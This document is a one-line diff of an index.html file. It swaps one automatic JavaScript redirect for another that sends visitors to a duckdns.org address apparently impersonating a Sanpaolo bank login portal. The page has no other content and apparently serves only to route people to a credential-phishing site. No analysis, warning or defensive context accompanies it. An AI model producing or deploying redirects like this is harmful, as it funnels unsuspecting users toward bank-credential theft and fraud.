--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location = "https://conto.nerdpol.ovh/r/Pg6dWOY";</script>
+<script type="text/javascript">window.location = "https://servizio-online-sicurezza-portale-login.duckdns.org/login-form-sanpaolo/portale-accedi";</script>
